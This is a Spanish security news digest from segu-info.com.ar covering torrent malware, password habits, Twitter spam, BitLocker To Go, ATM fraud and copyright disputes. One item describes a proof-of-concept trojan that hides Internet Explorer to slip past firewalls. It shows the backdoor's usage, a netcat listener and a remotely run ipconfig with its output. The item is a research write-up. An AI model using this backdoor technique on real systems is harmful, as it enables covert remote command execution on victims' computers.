Crece la distribución de malware en torrent y las redes P2P

Dada su gran popularidad para intercambiar archivos online, las redes de intercambio P2P y los populares archivos torrent están siendo cada vez más utilizados por los ciberdelincuentes para la distribución masiva de malware.

G Data advierte de un notable incremento del número de archivos infectados entre los que se intercambian los usuarios de Internet a través de las redes peer to peer (P2P). De acuerdo con los análisis llevados a cabo por los laboratorios de seguridad de la compañía, desde principios de esta semana casi se ha triplicado la cantidad de malware que circula junto a software pirata, mapas de navegadores, tonos para móviles, vídeos o los archivos de música que se descargan habitualmente los internautas. Con más de un 90% de archivos infectados en los análisis realizados esta misma semana, Torrentreactor.net supera en la distribución de malware a sitios como torrent.to o The Pirate Bay.

Los archivos torrent se han consolidado definitivamente como el sistema más utilizado por la comunidad online para compartir archivos. En concreto, el número de internautas que emplean estos sistemas gira en torno a varios millones, lo que explica su enorme atractivo, al igual que las redes P2P, despiertan entre los ciberdelincuentes para distribuir código malicioso y todo tipo de malware.

De acuerdo con las estadísticas sobre malware que elabora G Data, llama especialmente la atención el papel de http://www.torrentreactor.net como fuente de distribución de malware. En los últimos tres días se han producido más de 2.400 incidencias, en las que G Data ha impedido la infección de dominios mediante archivos torrent infectados con malware. Como comparación, los laboratorios de seguridad de G Data recibieron durante todo el mes de agosto 9.400 archivos con malware procedentes de redes P2P. Si la tendencia se mantiene, las cifras relativas a este tipo de malware pueden doblarse en el mes de septiembre

Ralf Benzmüller, director de los laboratorios de seguridad de G Data, considera que “las cifras hablan por sí solas y desde G Data queremos prevenir a los usuarios de Internet del peligro que entrañan las redes peer-to-peer y los archivos ‘torrent’. Además de los problemas que puedan derivarse de la aplicación de las leyes que vigilan el cumplimiento de los derechos de autor, la descarga de software implica un elevado riesgo de infectar nuestros ordenadores con archivos que contienen todo tipo de malware”.

Fuente: Network World

www.segu-info.com.ar

Las hombres reusan más sus claves que las mujeres

Encuesta concluye que las mujeres tienen una posición mucho más aventajada que su contraparte masculina en un área importante de la informática: la seguridad.

Investigación realizada por la empresa de seguridad informática PC Tools entre 4.500 usuarios de PC y servicios en línea concluye que las mujeres cambian con mayor frecuencia sus claves de acceso a tales servicios.

En la encuesta, PC Tools abordó diversos aspectos de la seguridad informática entre un grupo representativo de la población. El 47% de los consultados varones dijo usar la misma clave para todos los sitios que visita. Entre las mujeres encuestadas, solo el 26% declaró hacer lo mismo.

Dos terceras partes de los varones admitieron abrir archivos anexos o hacer clic en enlaces sin considerar antes el potencial de riesgo involucrado. Entre las mujeres, el 48% admitió ser igual de descuidadas.

Para el caso de los hombres, la situación contrasta sobremanera con los conocimientos sobre seguridad informática que dicen tener. En efecto, el 85% de los varones dijo saber que los enlaces de hipertexto incluidos en sitios web, correo electrónico o Messenger pueden conducir a sitios malignos. Por su parte, el 44% de las mujeres dijo estar consciente de tales riesgos.

La encuesta fue realizada en Inglaterra, Francia, Alemania, Bélgica, Países Bajos y Luxemburgo, y contó con la participación de 4.500 personas.

Fuente: DiarioTI y The Register

www.segu-info.com.ar

Formas eficaces de combatir el spam en Twitter

Como bien se apunta entre los investigadores que le siguen la pista al malware y los spammers, las redes sociales son el nuevo territorio sobre el que se mueven los ciberdelincuentes.

Y es por ello que no debe ser raro que Twitter, una de las redes sociales más frecuentadas por los usuario de la web, sea objeto de numerosos intentos de ataque y sobre él se desplieguen variadas estrategias para robar datos o infectar el ordenador de los usuarios del popular servicio de microblogging.

No obstante si bien las formas de llegar a los usuarios son diversas, uno de los recursos recurrentes es el spam, algo que desgraciadamente es cada vez más común en Twitter; y una m0lestia en todos los sentidos, que pese a los intentos de eliminación sigue rondando entre la gran cantidad de tweets que se escriben al día.

Es por ello que con el fin de evitarles dolores de cabeza hoy en Spamspam les traemos algunas formas eficaces y prácticas de combatir el spam en Twitter, desde herramientas hasta tips sencillos, pero de buena utilidad:

Twitblock: Una herramienta que sin duda destaca por su simpleza de uso pero enorme utilidad, ya que con ella podemos analizar a nuestros followers uno a uno para averiguar si se trata de un spammet o no, si la respuesta es afirmativa te ofrece la opción de bloquear dicho seguidor, con lo que te podrás librar de tweets molestos y peligrosos.

Reportarselo a @spam: Uno de los intentos del staff de Twitter por eliminar la basura electrónica de su servicio. Por este medio podemos reportar cualquier cuenta spammer con sólo mandar un simple reply seguido de la cuenta no grata: @spam @unspammer, por poner un ejemplo.

Tweetblocker: Una herramienta que se encargara de escanear a tus seguidores asignandoles unas calificación de la A a la F, la cual mide su nivel de confiabilidad, en otras palabras si son humanos o no, lo mejor es que no hay que ingresar la contraseña de tu cuenta para utilizar Tweetblocker.

Como nota final puedo decir que siempre podremos convertir nuestra cuenta a privada cuando los spammers en verdad anden insoportables, pero eso quedará de última, ya que las herramientas antes mencionadas son pod

Fuente: Spam Spam

www.segu-info.com.ar

Asegurando dispositivos removibles desde Windows 7

Bitlocker fue incluido por primera vez en MS Windows Vista, proveyendo un sistema de protección de los datos y el sistema operativo con una metodología de cifrado aún cuando el S.O no esté funcionando. Los equipos portátiles tienen cada vez mayor difusión y su uso es cada vez más frecuente por parte de los usuarios de las compañías. La problemática del uso de este tipo de equipo, es cuando un usuario denuncia su perdida. Más allá del valor monetario del mismo, lo que se pone en riesgo es la información que se encontraba en el equipo almacenado en ese momento. En Ms Windows 7 incluye ahora Bitlocker To Go, permitiendo extender la protección a los dispositivos de almacenamiento extraíbles.

Contenido completo en Seguridad IT

www.segu-info.com.ar

Los gigantes de Internet se pelean por las fotos que se suben a la Red

Hay más de 20.000 millones de fotografías subidas a páginas “tradicionales” de intercambio, como Flickr, Picasa, Kodak y Shutterfly.

Algún día el denominado “momento Kodak” podría llamarse el momento “Facebook” o “Twitpic”, pero los servicios de gestión de fotografías de la vieja escuela están luchando por salir en la imagen.

Los usuarios de Internet acuden en forma masiva a redes sociales populares como Facebook y MySpace para compartir imágenes con amigos y familiares, o abriendo espacios propios en sitios como Flickr (de Yahoo), Snapfish, Photobucket, Shutterfly y Picasa (de Google).

Sin embargo, hay más de 20.000 millones de fotos subidas a páginas “tradicionales” de intercambio de fotos, por lo que éstos no pueden ser descartados. En particular, en lo que se refiere a impresión y servicios personalizados, las web de intercambio de fotos continúan teniendo su influencia.

Contenido completo en Infobae Profesional

www.segu-info.com.ar

Manual de Buenas Prácticas para la persecución de los delitos contra la Propiedad Intelectual

La experiencia llevada a cabo en ámbitos como la asistencia judicial internacional o la lucha contra la violencia de género, ha servido para constatar las posibilidades que ofrece la redacción de Manuales de Buenas Prácticas, Prontuarios o Protocolos de actuación, a la hora de ayudar a mejorar la eficacia y coordinación de las actuaciones de la Administración de Justicia y de las Fuerzas y Cuerpos de Seguridad.

Desde una perspectiva que aspira a conciliar el enfoque teórico con la recomendación práctica, este Manual recopila los datos estadísticos oficiales sobre «piratería» en nuestro país, describe los efectos nocivos de este fenómeno sobre el conjunto de la sociedad española, apunta las cuestiones clave que hay que abordar para desarrollar una eficaz protección penal de la propiedad intelectual, propone posibles vías de mejora o refuerzo en este campo, y, por último, perfila estrategias de futuro que garanticen la continuidad de los trabajos que aborda.

Fuente: Ministerio de Cultura de España

www.segu-info.com.ar

Troyanos titiriteros

Aunque la palabra ‘titiritero’ a día de hoy tiene múltiples acepciones y en general engloba a muchas actividades circenses, el origen de esa palabra es aquellas personas que movían marionetas en espectáculos de teatro.

El tipo de troyano del que vamos a hablar hoy va en esa linea, troyanos que usan como marionetas programas del PC para comunicarse con el exterior.

Primero de todo, algo de background, en entornos Microsoft existe una tecnología llamada OLE/COM por la cual ciertos programas exportan su funcionalidad fuera del programa de forma que pueden ser llamados como ’servicios’ desde aplicaciones externas. Un ejemplo: la mayoría de programas de la suite Office de microsoft pueden ser usados sin necesidad de intervención humana, por ejemplo, podemos abrir una hoja excel y hacer uso de alguna función matemática desde un script escrito en Visual Basic, ¿Como? simplemente hay que localizar el objeto OLE/COM de excel y usarlo empleando los métodos que exporta como si se trataran de funciones nativas.

Otro de los programas que exporta su funcionalidad es Internet Explorer, haciendo uso del objeto InternetExplorer.Application.1 podemos abrir una instancia de Explorer, navegar con ella y extraer el contenido de una pagina web desde un script. Además, si hacemos esa ventana invisible, podemos hacer todo eso sin que haya evidencias al respecto.

Entonces, pudiendo navegar usando Internet Explorer de forma oculta, es bastante sencillo implementar un troyano que use Explorer como vehículo para implementar un backdoor.

Este tipo de troyanos son útiles en dos escenarios bastante típicos, por un lado en las intranets corporativas donde no se permite conectividad directa hacia el exterior y es necesario emplear un proxy con autenticación

Otro escenario bastante común es el uso de Firewalls (normalmente integrados en el antivirus) que bloquean las aplicaciones que intentan hacer conexiones, por lo general estos firewalls vienen configurados por defecto para dejar salir ciertos programas, entre ellos, como no: Internet Explorer, entonces, empleando internet explorer como ‘títere’ para la comunicación al exterior, conseguimos hacer un bypass del Firewall (click para agrandar la imagen)

Como prueba-de-concepto he implementado un backdoor que hace uso de esta técnica y que permite ejecutar comandos remotamente usando el navegador como intermediario, se puede obtener desde aquí y funciona de la siguiente manera:

En el PC que actúa a modo de cliente (el troyano) ejecutamos:

ietroj.exe 192.168.1.45 (la dirección IP del servidor)

En el servidor, con un simple netcat es suficiente:

nc -l -p 80

Al conectar, el troyano informa que está esperando ordenes:

POST /cgi-bin/ HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: es
Content-Type: text/plain
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: 192.168.157.1:8000
Content-Length: 20
Connection: Keep-Alive
Cache-Control: no-cache

Ready for commands

vamos a obtener la salida del comando ipconfig, para ello, desde el netcat, escribimos:

command ipconfig

Cerramos el netcat (Crt+C) y lo volvemos a lanzar para obtener la respuesta:

nc -l -p 80

el cliente vuelve a conectar y …

POST /cgi-bin/ HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: es
Content-Type: text/plain
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: 192.168.157.1:8000
Content-Length: 327
Connection: Keep-Alive
Cache-Control: no-cache

Configuración IP de Windows

Adaptador Ethernet Conexión de área local :

Sufijo de conexión específica DNS : localdomain
Dirección IP. . . . . . . . . . . : 192.168.157.128
Máscara de subred . . . . . . . . : 255.255.255.0
Puerta de enlace predeterminada : 192.168.157.2

et vuala, nos envía la salida del comando.

Autor: Yago Jesus
Fuente: Security by Default

www.segu-info.com.ar

Informe de ENISA sobre el fraude en cajeros automáticos

Ante la alarmante cifra desvelada por ENISA que revela unas pérdidas de unos 500 millones de euros, ENISA hace un llamamiento entre los consumidores para que sean más conscientes de los riesgos existentes y tomen precauciones para evitar convertirse en víctimas del fraude. El rápido crecimiento del número de cajeros automáticos, combinado con ataques más sofisticados y el incremento e innovación de técnicas de fraude, se ha traducido en un aumento alarmante del 149% en el fraude a través de cajeros automáticos en 2008.

Estos preocupantes resultados, junto con la información y los estudios que se han realizado sobre fraude en cajeros automáticos y las recomendaciones para ayudar a detectarlos y evitar convertirnos en nuevas víctimas, se han publicado en el estudio de ENISA titulado “Fraude en cajeros automáticos: Descripción de la situación europea y las reglas de oro para poder evitarlo”.

El número de incidentes en cajeros automáticos en Europa creció un 6% el año pasado alcanzando los 400.000 casos, muchos de las cuales se localizaron en aeropuertos y gasolineras. El setenta y dos por ciento de los casos de fraude en cajeros automáticos europeos se localizan en sólo cinco países: Reino Unido, España, Alemania, Francia e Italia.

El dinero en efectivo obtenido a través del fraude en cajeros continua siendo el método preferido por los delincuentes que obtienen los números PIN con una amplia gama de técnicas que van desde el ‘shoulder surfing’ (cuando ven el PIN que metes en el cajero mirando por encima de tu hombro) a técnicas de skimming complejo (cuando instalan algo en el lector de tarjetas para clonar la tarjeta). Estas técnicas pueden implicar el uso de una pequeña cámara espía, una superposición falsa de teclado e incluso cajeros falsos, mientras que cada vez más, la tecnología Bluetooth es utilizada para transmitir información tanto de la tarjeta como de su PIN a un portátil cercano. Tan solo, durante 2008, un total de 10.302 incidentes de skimming se registraron en Europa.

Otros métodos utilizados en este tipo de fraude para extraer dinero son la captura y recuperación de las tarjetas de los usuarios, detener la retirada en medio de una transacción y completarla una vez que el usuario ha abandonado el cajero. Las bandas criminales organizadas también están utilizando sofisticadas técnicas de phishing y piratería en los sistemas informáticos de los bancos y los sitios web para obtener información de cuenta y PIN.

Los robos en cajeros automáticos y las agresiones físicas también han sufrido un aumento de un 32% en los últimos 12 meses a partir de los ataques físicos contra la integridad del cajero.

ENISA ha elaborado su lista de reglas de oro para ofrecer la máxima protección con el mínimo esfuerzo.

Las Reglas de Oro de ENISA:

Elección de un cajero automático

1. No utilizar los cajeros automáticos que contengan algún tipo de señalización adicional o de advertencias
2. Trate de usar los cajeros automáticos situados dentro de las entidades bancarias
3. No utilizar los cajeros automáticos independientes o fuera de las oficinas bancarias.

Entorno físico

4. Utilice cajeros automáticos que estén a la vista y bien iluminados
5. Tenga cuidado con los extraños y compruebe que se encuentran a una distancia razonable

La realización de operaciones en los cajeros

6. Preste especial atención a la parte delantera de la máquina para observar si han sido manipulados
7. Preste atención al lector de tarjetas para ver si hay signos de algún dispositivo adicional
8. Mire cuidadosamente si nota alguna diferencia o algo inusual en el teclado de marcación
9. Compruebe que hay cámaras
10. Proteja su PIN tapando el teclado durante la marcación
11. Informe de inmediato cuando el cajero no le devuelva su tarjeta

Comprobaciones

13. Examine con frecuencia su extracto del banco
14. Informe inmediatamente cualquier actividad sospechosa

Fuente: Blog S21sec

www.segu-info.com.ar

Red social publicaba IP de mensajes emitidos por menores de edad

Página web publicaba direcciones IP de sus usuarios participantes, en su mayoría menores de edad, junto a los comentarios y fotografías que aparecían en los mensajes, esto como medida de colaboración a investigaciones sobre mensajes difamatorios y fotografías comprometidas de menores de edad.

Dicha medida fue publicada en el sitio web mediante una nota, sin requerir el consentimiento por parte de los usuarios, y además esta también alcanzaba a los mensajes alojados anteriormente a la medida. Este sitio web era una red social que permitía a sus usuarios intercambiar comentarios, alojar fotografías, chatear, entre otras facultades.

La Oficina de Defensa de los Derechos del Menor de las Islas Baleares, denunció el hecho ante la Agencia Española de Protección de Datos Personales, mediante diligencias de la Unidad de Policía Judicial se confirmó que la página web indicaba el origen I.P de los mensajes publicados en el sitio web.

Según la resolución de la Agencia, la jurisprudencia española reconoce que el derecho a la intimidad es un derecho individual y no de carácter colectivo, que dentro de este se sitúa la protección de datos personales que es el poder de resguardar su vida privada de una publicidad no querida.

La Ley Orgánica de Protección de Datos española (LOPD) define dato de carácter personal como cualquier información concerniente a personas físicas identificadas o identificables que puede ser cualquier información numérica, alfabética, entre otras.

El término identificable refiere que la identidad pueda determinarse de manera directa o indirecta. En este sentido, el Dictamen 4/2007 del Grupo de Trabajo de la Directiva 95/26/CE que reúne a las Autoridades de Protección de Datos de los Estados miembros de la Unión Europea considera a las direcciones IP como datos sobre una persona identificable, es decir, datos de carácter personal.

Así también, la LOPD estipula que el responsable del fichero tiene responsabilidad del resguardo de los datos de carácter personal, a fin de evitar accesos no autorizados por los titulares de los datos.

Determinada la responsabilidad del responsable del sitio web del deber de secreto respecto a las direcciones IP, la Agencia tuvo que archivar las actuaciones por no poder determinar quien es la persona o entidad responsable del sitio web, debido a que ya no se encuentra accesible el sitio a través de Internet y en los datos de registro del dominio contiene la frase “Not yet”.

Fuente: http://www.iriartelaw.com

www.segu-info.com.ar

Los editores argentinos podrían demandar a Google

Por: Guido Carelli Lynch

Abogados vinculados a la cámaras editoriales nacionales estudian un recurso de amparo para prohibir la digitalización de libros pertenencientes a editoriales argentinas.

Una semana después de la visita al país de Tom Turvey, el director de las asociaciones estratégicas de Google, que estuvo reunido con un sinnúmero de editores locales, el abogado de la Cámara Argentina del Libro (CAL) y del Centro de Administración de Derechos Repográficos, Gerardo Filipelli, estudia junto a un grupo de colegas la posibilidad de presentar un amparo colectivo contra Google Libros en la Justicia argentina.

“La visualización que se permite de esos libros es una infracción a la ley argentina y a algunos convenios internacionales”, señaló Filipelli ante la consulta de Clarín, un día antes de que prescribiera la fecha límite para que las editoriales de todo el mundo se autoexcluyan o acepten el acuerdo propuesto por el coloso cibernético, ante la demanda iniciada por editores y autores de los Estados Unidos. De ese acuerdo, convenido en la justicia norteamericana surgió el formulario para que las editoriales de todo el mundo se autoexcluyan voluntariamente de la digitalización. Aquellos que no rechacen la propuesta quedarán dentro del programa y se les pagará hasta 60 dólares por obra digitalizada.

“La inclusión por omisión es la gran victoria de Google, que con la digitalización estaría violando la Ley 11.723 (de propiedad intelectual) y el Convenio de Berna (para la Protección de obras literarias y artísticas), además de los Tratados Internacionales de Derechos Humanos, que incluye los derechos de autor”, especificó Filipelli. Si la medida prosperara –adelantó el letrado- obligaría a Google a tomar las medidas tecnológicas necesarias para que no se visualicen en Argentina los libros sin la previa autorización de los titulares de los derechos, quienes podrían reclamar una indemnización por las obras digitalizadas sin la consiguiente aprobación. El amparo debería ser presentado por una asociación civil, que bien podría ser la mencionada CADRA o la CAL, ambas representadas por Filipelli.

Sin embargo, el titular de esa cámara, Carlos De Santos, tomó distancia de los dichos de Filipelli. “Si existiera la posibilidad jurídica se podría hacer, pero en la cámara hay diferentes opiniones y todavía no se planteó algo semejante”, señaló el también editor de Manantial Ediciones, que, por otra parte, decidió autoexcluirse del acuerdo propuesto por Google.

Las editoriales Colihue, Heliasta, Losada, La Roca y Librerías Turísticas también se autoexcluirían del acuerdo. Otras 30 editoriales, entre las que se cuentan las principales multinacionales del libro sí acordaron suscribir a éste y otro tipos de convenios con Google. Katz Editores, por ejemplo, sí acordó permitir que sus libros estén incluidos en las búsquedas de Google Libros. “Para nosotros, es importante dar al lector la mayor cantidad posible de herramientas para que tome la decisión de comprar nuestros libros. Creemos, también, que no perdemos nada, pero la única precaución que, creemos, debe atenderse, es aquella que alerta sobre el riesgo de un monopolio futuro a partir de la gran concentración de contenidos, tal como señaló Robert Darnton en la New York Review of Book.

En los últimos días editores alemanes y de otros países europeos se manifestaron en contra del acuerdo impulsado por Google, que hasta el momento lleva más de 10 millones de libros escaneados e indexados.

Fuente: Ñ Clarin

www.segu-info.com.ar